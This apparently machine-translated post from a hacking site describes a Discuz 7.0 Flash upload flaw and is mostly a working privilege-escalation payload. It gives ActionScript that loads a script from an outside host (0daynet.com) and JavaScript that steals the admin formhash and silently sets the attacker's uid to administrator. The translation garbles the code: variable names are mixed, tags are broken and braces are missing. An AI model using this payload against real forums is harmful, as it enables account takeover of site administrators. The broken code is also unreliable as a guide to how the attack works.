Discuz7. 0. 0 Flash Xss old vulnerabilities new ideas-vulnerability warning-the black bar safety net

ID MYHACK58:62201026353
Type myhack58
Reporter 佚名
Modified 2010-03-08T00:00:00


DZ official website to see a bit, have been unable to upload jpg suffix swf file, but everyone noticed it, and DZ matching ucenter space album, you can upload a jpg suffix swf file.

So I downloaded the latest version of DZ7. 0 and ucenter and ucenter space, test the consequences and then can be uploaded, so in other words, there is a csrf vulnerability, but the use of conditions must be met discuz. net domain there must be a can be embedded in a flash page, ordinary registered users are not in the dz official website to publish the embedding flash post.

In addition to everyone a things that I write dz6. 0 universalxssimprove themselves as administrators of the script.

The first is the flash actionscript, it can automatically detect the poster of the uid, and pass the php suffix js file getURL("javascript:var re = new RegExp('authorid=(.+)\"',' ig'); var arr = re. exec(document. body. innerHTML); uid = arr[1]; document. all. tags('SCRIPT')[0]. src='http://www.0daynet.com/xss/discuz6.js.php?uid=' + uid;eval();","_self"); Then is to generate the js php code copy the Racle of their own slightly changed under the generic var url="<?= dirname($_SERVER['HTTP_REFERER'])?& gt;/";

var request = false;

if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');


} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i<versions. length; i++) {

try {

request = new ActiveXObject(versions);

} catch(e) {}





xmlHttpReq. open("GET", url+"admincp. php? action=home", false);

xmlHttpReq. send(null);

var resource = xmlHttpReq. responseText;

var numero = resource. search(/formhash/);

var formhash=encodeURIComponent(resource. substr(numero+17,8));

alert("admincp. php? action=editgroups&uid=<?=$ _REQUEST['uid']?& gt;");

var post="formhash="+formhash+"&amp; groupidnew=1&extgroupidsnew[]=1&editsubmit=%CC%E1%2 0%BD%BB";//structure to carry the data

xmlHttpReq. open("POST",url+"admincp. php? action=editgroups&uid=<?=$ _REQUEST['uid']?& gt;",false);//use the POST method to open a connection to the server, asynchronously communication

xmlHttpReq. setRequestHeader("Referer", url);

xmlHttpReq. setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword, /");

xmlHttpReq. setRequestHeader("content-length",post. length);

xmlHttpReq. setRequestHeader("content-type","application/x-www-form-urlencoded");

xmlHttpReq. send(post);//send data

There is,now is still a lot of people with a dz6,a lot of people put that insert the word vulnerability patch on,but still can be set as a background administrator.